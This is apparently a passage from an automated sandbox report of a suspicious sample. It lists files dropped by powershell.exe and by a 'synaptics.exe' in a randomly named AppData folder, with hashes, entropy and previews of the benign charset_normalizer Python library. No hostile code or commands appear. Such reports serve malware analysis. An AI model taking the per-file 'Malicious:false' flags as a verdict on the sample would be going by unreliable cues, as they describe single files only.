                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9QpzuzmQDDopFhZQ5gdtpzHEbWF1R1ULn4DGAlU4YOSxa5VczNJXbsGy9a:paQDg9fa4R7SQVc5+Gy9a
                                                                                                                                                                                                            MD5:8F724EB327A1DEA0C1484A3FA12D645B
                                                                                                                                                                                                            SHA1:F4E3BDD4326AA8B75857554519C537E4D3222073
                                                                                                                                                                                                            SHA-256:7BFAAFD44E29963539FC6BE9AE9FB644CC91B39B968759CC22AB741765592802
                                                                                                                                                                                                            SHA-512:AECBE600626854EF85882B01240E8E11E0FCBA90993610A0CBB9A00AC52EF7CC99AFCFA8D8A98850F8AB45E4D5FCC9C8FF9DF20F6F98E7C99A06341F96DA8512
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Q.......................@...sz...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d.e...Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d...d.e...Z$G.d.d...d.e...Z%G.d.d...d.e...Z&e.d.d...d.e.e'..d.e.e'..d.e(f.d d!....Z)e.d"d....$d+d%e'd&e*d'e(d.e*f.d(d)....Z+d*S.),.....)...lru_cache)...getLogger)...List..Optional.....)...COMMON_SAFE_ASCII_CHARACTERS..TRACE..UNICODE_SECONDARY_RANGE_KEYWORD)...is_accentuated..is_arabic..is_arabic_isolated_form..is_case_variable..is_cjk..is_emoticon..is_hangul..is_hiragana..is_katakana..is_latin..is_punctuation..is_separator..is_symbol..is_thai..is_unprintable..remove_accent..unicode_rangec....................@...sP...e.Z.d.Z.d.Z.d.e.d.e.f.d.d...Z.d.e.d.d.f.d.d...Z.d.d.d...Z.e.d.e.f.d.d.....Z.d.S.)...MessDetectorPluginzy. Base abstract class used for mess detection plugins.. All detectors MU
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12007
                                                                                                                                                                                                            Entropy (8bit):5.186949659436367
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:N8lTF3s0zwVlZi2HCR6hXxmurjNgJb4oYWwNfyRh1b0jhmp3pfHZ0WWucT:MTF800Vl82HCR6hXHrjNgJbbYWjv1b0p
                                                                                                                                                                                                            MD5:A4808DEEF1D06F1D2E4D5A450323C505
                                                                                                                                                                                                            SHA1:83A92BEF9E33CE0C95C4AFA5215EB7FB92139932
                                                                                                                                                                                                            SHA-256:6BA49720B9CB8FC84C80D5ED8B48037212193EBC3585C1130579D7775622FF39
                                                                                                                                                                                                            SHA-512:0B0C07D1560B99253AAD8B36A8935D11F1F2A56DAE99AF6EF8BA1F6160FCA09D76A282FF948381B90E1DB412E6272CFDAA00DD6ACE2EA6B7DBD348963C11B25B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...sub)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...RE_POSSIBLE_ENCODING_INDICATION..TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z.....d>d.e.d.e.d.e.d.e.d.d.d.e.e...d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d?d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d d!....Z.e.d.e.e...f.d"d#....Z.e.d.e.f.d$d%....Z.e.d.e.f.d&d'....Z.e.d.e.f.d(d)....Z.e.d.e.f.d*d+....Z.e.d.e.f.d,d-....Z.e.d.e.f.d.d/....Z.e.d.e.d...f.d0d1....Z.e.d.e.f.d2d3....Z.e.d.e.e...f.d4d5....Z.e.d.e.e...f.d6d7....Z d@d9e.d.e.f.d:d;..Z!e.d.e.f.d<d=....Z"d.S.)A..CharsetMatchN..payload..guessed_encoding..m
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12032
                                                                                                                                                                                                            Entropy (8bit):5.193561985207815
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:3Q8lTF3s0SwVlZi2HCR6hXxmurjNgJb4oYWwNfyRh1b0jhmp3pfHZ0WWucT:LTF80NVl82HCR6hXHrjNgJbbYWjv1b0p
                                                                                                                                                                                                            MD5:9B4026E561F9569E5B1AABDACB73B0AB
                                                                                                                                                                                                            SHA1:2A78CAB613F4F58770443CEBA94EEA7CC5F8410A
                                                                                                                                                                                                            SHA-256:A6624E91744256854E414B5E8CA0182D1E2316576A75B379CE4ECEFD6772EB76
                                                                                                                                                                                                            SHA-512:67D1F41B7D6D3C54772BE44A22C753EF40A1C7E524DF1669BA9B7B66A84BAFE6E9BC752A01CB5A5AA53CACC1536611F7266411F9EC9E42BF48D13D35A8354541
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...sub)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...RE_POSSIBLE_ENCODING_INDICATION..TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z.....d>d.e.d.e.d.e.d.e.d.d.d.e.e...d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d?d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d d!....Z.e.d.e.e...f.d"d#....Z.e.d.e.f.d$d%....Z.e.d.e.f.d&d'....Z.e.d.e.f.d(d)....Z.e.d.e.f.d*d+....Z.e.d.e.f.d,d-....Z.e.d.e.f.d.d/....Z.e.d.e.d...f.d0d1....Z.e.d.e.f.d2d3....Z.e.d.e.e...f.d4d5....Z.e.d.e.e...f.d6d7....Z d@d9e.d.e.f.d:d;..Z!e.d.e.f.d<d=....Z"d.S.)A..CharsetMatchN..payload..guessed_encoding..m
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12032
                                                                                                                                                                                                            Entropy (8bit):5.193561985207815
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:3Q8lTF3s0SwVlZi2HCR6hXxmurjNgJb4oYWwNfyRh1b0jhmp3pfHZ0WWucT:LTF80NVl82HCR6hXHrjNgJbbYWjv1b0p
                                                                                                                                                                                                            MD5:9B4026E561F9569E5B1AABDACB73B0AB
                                                                                                                                                                                                            SHA1:2A78CAB613F4F58770443CEBA94EEA7CC5F8410A
                                                                                                                                                                                                            SHA-256:A6624E91744256854E414B5E8CA0182D1E2316576A75B379CE4ECEFD6772EB76
                                                                                                                                                                                                            SHA-512:67D1F41B7D6D3C54772BE44A22C753EF40A1C7E524DF1669BA9B7B66A84BAFE6E9BC752A01CB5A5AA53CACC1536611F7266411F9EC9E42BF48D13D35A8354541
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...sub)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...RE_POSSIBLE_ENCODING_INDICATION..TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z.....d>d.e.d.e.d.e.d.e.d.d.d.e.e...d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d?d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d d!....Z.e.d.e.e...f.d"d#....Z.e.d.e.f.d$d%....Z.e.d.e.f.d&d'....Z.e.d.e.f.d(d)....Z.e.d.e.f.d*d+....Z.e.d.e.f.d,d-....Z.e.d.e.f.d.d/....Z.e.d.e.d...f.d0d1....Z.e.d.e.f.d2d3....Z.e.d.e.e...f.d4d5....Z.e.d.e.e...f.d6d7....Z d@d9e.d.e.f.d:d;..Z!e.d.e.f.d<d=....Z"d.S.)A..CharsetMatchN..payload..guessed_encoding..m
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8896
                                                                                                                                                                                                            Entropy (8bit):5.4592992657079655
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:1OkSS4/TPTRTa5Tl1T+T8IunXU32ZQr4lYuoFaFEj:oSgrBalFA8ImEmycrFo
                                                                                                                                                                                                            MD5:3D559CA0BF5B32BE9170C7967569998C
                                                                                                                                                                                                            SHA1:4CB45D848A869BCBFE52027F777788BBD82C86ED
                                                                                                                                                                                                            SHA-256:0D5D68F370E171113BBCC6A37C99ED9AD2BE83DE71C625CF2946FEFE7F50A972
                                                                                                                                                                                                            SHA-512:FEB6B312427E6C3ACD048C6D240BA9F12D48701B48F5E6AC406FEB968A89495C91C192C5720DA2E8EB51E16B7871BADD7B7D4DE3B3549BF94813C353E99D72A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8921
                                                                                                                                                                                                            Entropy (8bit):5.469911563813262
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:bnaWk33eyNwQTpaKOvKDqZd9KkzZYozi7WHLuo8+baItNZo87eef2sfGdrB6bQPm:QHk+DqZNzk7yuoXbpLZDTfhGdpr4FFv
                                                                                                                                                                                                            MD5:9379432EA59F746349B1249694B23A10
                                                                                                                                                                                                            SHA1:E3F8C32F3A48B0E5AF7E8908B615ACE6BD5454B2
                                                                                                                                                                                                            SHA-256:A34EF5A79BCD280FDC585301673CA25D27D1AD846B84BAF926D4EB4B16B09EE7
                                                                                                                                                                                                            SHA-512:2E063E2FF6C7357D062F1B02F005BADCBDF235FC827765525546460E977E0322AE6850EEA57EC21A3605D2C982585892F2BF4BFF7359DDCDC038626EB38A44FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8921
                                                                                                                                                                                                            Entropy (8bit):5.469937826293192
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:bnaWk33eyNwQTpaKOvKDq2ud9KkzZYozi7WHLuo8+bHtNZo87Nf2sfGdrB6bQPTC:QHk+Dq2uNzk7yuoXbHLZDNfhGdpr4FFv
                                                                                                                                                                                                            MD5:BBCDB63CAE5060EA66D6820448A6682E
                                                                                                                                                                                                            SHA1:75239B4974C9420A3975C566AD6301F3114ACFBD
                                                                                                                                                                                                            SHA-256:7C36ABC01C2BB0EEB9A0D9B72B98C33141D6245B916690A16A34121E324DC301
                                                                                                                                                                                                            SHA-512:AC1D0DD9FA829DC68414B4052235A8C620AEDD0A266CED8ECD225AF040FDD687DBF075CECC1151447AA8E4EE17D452D4A1E332FAF1FF95D3F2BEAC6EE6038AA9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):240
                                                                                                                                                                                                            Entropy (8bit):5.177974537495019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Dw8/z/Oszurb63DbqUArsQx6G3D8Isi:CDR/z/OsJ33q4Q8GT8Iv
                                                                                                                                                                                                            MD5:5C3805C50C60901DFE04FDAC566A02CD
                                                                                                                                                                                                            SHA1:123D0B5924ECEA686273DFC267D6F7511DA29CCA
                                                                                                                                                                                                            SHA-256:AE90DEEA81A458B8F6C7AE7AE85117AB06AEB3880B758CE39E03E08A1BA5BC3D
                                                                                                                                                                                                            SHA-512:0F1527ADF4FBB51F6582B07380A4207C0399DADE6897EA51F92215FA78AF574F279E5DFD1EF979A1798315D46A0B5FCB10ADDC253A2EFBE759679765E7627D1F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.4.0...N)...__doc__..__version__..split..VERSION..r....r.....>C:\WinExplorer\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                            Entropy (8bit):5.343036326655661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/pl0/z/Oszurb63Dbm8uwkn23h/a/ArsQx6G3D8Isi:Cpl0/z/OsJ33m8pfsHQ8GT8Iv
                                                                                                                                                                                                            MD5:D3CC70BEC5BB66BCE51E29668445A0B1
                                                                                                                                                                                                            SHA1:C1761551C80ED7BCC05A719B005E480F416C63FD
                                                                                                                                                                                                            SHA-256:901C5E93799D19CC9E5FAD6C643F123B536C68C5A738934C6260929E2BFAA766
                                                                                                                                                                                                            SHA-512:B868E5443F9F75B947C7DE6033C5456D6B1B23E75D837A59BB1526911A3B3CA89ABC7EE5FB885CC50A6F419719FFB06FB558CDACA9596D05CBF04C30E21F357F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.4.0...N)...__doc__..__version__..split..VERSION..r....r.....WC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                            Entropy (8bit):5.343036326655661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/pl0/z/Oszurb63Dbm8uwkn23h/a/ArsQx6G3D8Isi:Cpl0/z/OsJ33m8pfsHQ8GT8Iv
                                                                                                                                                                                                            MD5:D3CC70BEC5BB66BCE51E29668445A0B1
                                                                                                                                                                                                            SHA1:C1761551C80ED7BCC05A719B005E480F416C63FD
                                                                                                                                                                                                            SHA-256:901C5E93799D19CC9E5FAD6C643F123B536C68C5A738934C6260929E2BFAA766
                                                                                                                                                                                                            SHA-512:B868E5443F9F75B947C7DE6033C5456D6B1B23E75D837A59BB1526911A3B3CA89ABC7EE5FB885CC50A6F419719FFB06FB558CDACA9596D05CBF04C30E21F357F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.4.0...N)...__doc__..__version__..split..VERSION..r....r.....WC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23227
                                                                                                                                                                                                            Entropy (8bit):4.310656972155833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:p2x1hvkZ+5NKZBptLYe5pNjgaC6F6ExPFMNIo7g7ZSKF:Ax1hcZ+5NyppPpNjY6F6+Ob7cZSKF
                                                                                                                                                                                                            MD5:6E062F2076B28429B76A9AFABF24E315
                                                                                                                                                                                                            SHA1:36B50279692F35292F7145025D579E50E69D4D8D
                                                                                                                                                                                                            SHA-256:5135048C2FAD4912627692BF12DA0A532CF4642486A38F1CD18E244109379915
                                                                                                                                                                                                            SHA-512:8F7B2566D4991E59CBC86F5B3CEABC62E36EC4DFF1913E4D15427B2227AF27263DBF5A9CC6489D79C928957D6D6E1B66DC302D80CBF74748235F024D991640DC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import logging..from os import PathLike..from typing import BinaryIO, List, Optional, Set, Union....from .cd import (.. coherence_ratio,.. encoding_languages,.. mb_encoding_languages,.. merge_coherence_ratios,..)..from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE..from .md import mess_ratio..from .models import CharsetMatch, CharsetMatches..from .utils import (.. any_specified_encoding,.. cut_sequence_chunks,.. iana_name,.. identify_sig_or_bom,.. is_cp_similar,.. is_multi_byte_encoding,.. should_strip_sig_or_bom,..)....# Will most likely be controversial..# logging.addLevelName(TRACE, "TRACE")..logger = logging.getLogger("charset_normalizer")..explain_handler = logging.StreamHandler()..explain_handler.setFormatter(.. logging.Formatter("%(asctime)s | %(levelname)s | %(message)s")..)......def from_bytes(.. sequences: Union[bytes, bytearray],.. steps: int = 5,.. chunk_size: int = 512,.. threshold: float = 0.2,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12955
                                                                                                                                                                                                            Entropy (8bit):4.565085883136704
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:auWIiX1vR2Yf2bb6WjCKJdnZsisOQ07Tzfh+3gnfmus+rt5E/t7RV:ayiXF+Pp7Tzfh+wnfmufrt5E/t7RV
                                                                                                                                                                                                            MD5:743B974C6FFEB35D433C276B344A1140
                                                                                                                                                                                                            SHA1:F1CA137C1BA5049C0AB7661DE0E66F4C51F03DD8
                                                                                                                                                                                                            SHA-256:61F937B1B79ED17AA8D7EBE64186CEA8CE75F926A35CF2F31551BCF674EC6737
                                                                                                                                                                                                            SHA-512:26497E2EFA6761838067810097FE8B355AB5E838C3DBA908EA0240B158CB47B13717942B32F15A9AE8B3EBAFE2029412B9A777C7485F91A48A03D1892EBACE64
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import importlib..from codecs import IncrementalDecoder..from collections import Counter..from functools import lru_cache..from typing import Counter as TypeCounter, Dict, List, Optional, Tuple....from .constant import (.. FREQUENCIES,.. KO_NAMES,.. LANGUAGE_SUPPORTED_COUNT,.. TOO_SMALL_SEQUENCE,.. ZH_NAMES,..)..from .md import is_suspiciously_successive_range..from .models import CoherenceMatches..from .utils import (.. is_accentuated,.. is_latin,.. is_multi_byte_encoding,.. is_unicode_range_secondary,.. unicode_range,..)......def encoding_unicode_range(iana_name: str) -> List[str]:.. """.. Return associated unicode ranges in a single byte code page... """.. if is_multi_byte_encoding(iana_name):.. raise IOError("Function not supported on multi-byte code page").... decoder = importlib.import_module(.. "encodings.{}".format(iana_name).. ).IncrementalDecoder.... p: IncrementalDecoder = decoder(errors="ignore").. seen_ran
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):106
                                                                                                                                                                                                            Entropy (8bit):4.336412994117974
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1L6jZKXRYF0AaUFvLzaqDFoNW/kJM7RActNL4op:1Lu0BgounD6WsJM7ZtZ4op
                                                                                                                                                                                                            MD5:FAC8FDA8B9C67E4FE079EB2B712EA666
                                                                                                                                                                                                            SHA1:DCA37B0BF798ABC6801A97100549400939882371
                                                                                                                                                                                                            SHA-256:08EC0FF1F2B6A9BBA574C7A6DA52FCD4989E63E3C80361B6199E487403CC3C50
                                                                                                                                                                                                            SHA-512:01EBCBA22F54C86A9C4B7093523C1729917E097C29F626F6940AA71AA39622AE5D8DFB2272AF0ED64976795477B3ED1E881EA2FB9B17612664E60C28AC454DEA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .__main__ import cli_detect, query_yes_no....__all__ = (.. "cli_detect",.. "query_yes_no",..)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10731
                                                                                                                                                                                                            Entropy (8bit):3.9987051246473673
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ZVqYUPQuTDuX0gWPXEL4zAweFJltUlTmThp:ZVqYUP5DDXECGFJltUlUH
                                                                                                                                                                                                            MD5:B319DA9CEE4EF22D66E3F2B6E76E6593
                                                                                                                                                                                                            SHA1:01F7FF27B5BA37325F08FC98A98A28C3D67A5B39
                                                                                                                                                                                                            SHA-256:923B4683D8E38ECB66EA7F8AAF097D44744B52EAADDD30618F61D300D8077A80
                                                                                                                                                                                                            SHA-512:991A9684066BE8D15F1114A14DE7AECA2364B3012BF0AF58379B11D7FC32E5437FC5932C42ACBA76785742106C3454F71F18C18543E113B4913687F719C461A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
